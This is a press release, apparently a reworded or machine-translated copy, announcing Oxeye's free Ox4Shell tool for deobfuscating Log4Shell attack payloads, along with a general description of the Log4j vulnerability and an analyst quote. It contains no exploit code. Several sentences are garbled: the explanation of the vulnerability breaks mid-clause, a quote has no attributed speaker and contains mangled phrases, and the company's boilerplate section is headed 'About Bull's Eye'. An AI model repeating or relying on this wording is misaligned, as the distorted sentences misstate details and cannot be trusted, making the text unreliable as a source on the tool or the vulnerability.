Tel Aviv – January 12, 2022 – Oxeye, the technology innovator of cloud-native application security testing solutions, today launched its first 2022 open source initiative with the introduction of Ox4Shell. The powerful and free open source payload deobfuscation tool is the first in a series of solutions developed by Oxeye to help developers, AppSec professionals and the open source community. Ox4Shell is designed to combat what some call “Internet Covid”, the Log4Shell zero-day vulnerability. To combat a very effective obfuscation strategy used by malicious actors, Oxeye’s new open source tool (available on GitHub) exposes hidden payloads that are being actively used to obfuscate security protection tools and security teams.
As experts report, organizations around the world continue to suffer from remote code attacks and exposure of sensitive data due to the widespread Log4Shell vulnerability. Spotted in Apache’s Log4J, a logging system widely used by web and server application developers, the threat can inject text into log messages or log message parameters, then inject server logs, and then load code from remote servers for malicious purposes Using .Apache gives Log4Shell a CVSS severity score of 10 out of 10, the highest possible score. Researchers have since discovered similar vulnerabilities in the popular H2 database. The vulnerability is simple to execute and is estimated to affect hundreds of millions of devices.
“Log4j vulnerabilities are extremely common and affect enterprise applications, embedded systems, and their subcomponents,” said Jonathan Care, senior director analyst at Gartner. “Java-based applications, including Cisco Webex, Minecraft, and FileZilla FTP, are among the affected programs. Examples, but this is by no means an exhaustive list. The vulnerability even affects the Mars 2020 helicopter mission Ingenuity, which utilizes Apache Log4j for event logging.”
As part of a new open source initiative for 2022, Oxeye released the first in a series of contributions aimed at enhancing security efforts by deobfuscating payloads commonly used in conjunction with Log4J exploits. Ox4Shell exposes hidden payloads and transforms them into more meaningful forms to get a clear picture of what threat actors are trying to achieve. This allows all parties involved to take immediate action and address the vulnerability.
The Log4j library has some unique lookup features that allow users to look up environment variables, Java process runtime information, and more. These enable threat actors to probe specific information that can uniquely identify the infected machines they are targeting. Ox4Shell enables you to comply with such lookup functions by providing them with mock data that you control.
“The difficulty of applying the required patches to the Log4Shell vulnerability means that the vulnerability is and will leave a void for malicious attacks. Unless proper remediation is applied, obfuscation techniques are applied to the payload to circumvent the The ability to pass rule logic to bypass security measures also makes this a considerable challenge. Deobfuscation is critical to understanding the attacker’s true intent. Ox4Shell provides a powerful solution to this problem, as the open source community’s Backers, we’re proud to contribute and make it available through GitHub.”
Availability
Ox4Shell is generally available for free on GitHub. Oxeye invites developers and security professionals interested in learning more to visit https://www.oxeye.io/ox4shell-deobfuscate-log4shell or download the software at https://github.com/ox-eye/Ox4Shell. To schedule a personalized demonstration of the complete Oxeye Cloud Native Application Security Testing (CNAST) platform, visit https://www.oxeye.io/get-a-demo.
resource:
– Follow @OxeyeSecurity on Twitter
– Join Oxeye on LinkedIn https://www.linkedin.com/company/oxeyeio/
– Online access to Oxeye http://www.oxeye.io
About Bull’s Eye
Oxeye provides cloud-native application security testing solutions designed for modern architectures. The company enables customers to identify and address the most critical code vulnerabilities as an integral part of the software development lifecycle, disrupting traditional application security testing (AST) approaches by providing context-sensitive, painless, and comprehensive solutions , ensuring no vulnerable code enters production. Purpose-built for Dev and AppSec teams, Oxeye helps move security left while speeding up development cycles, reducing friction, and eliminating risk.
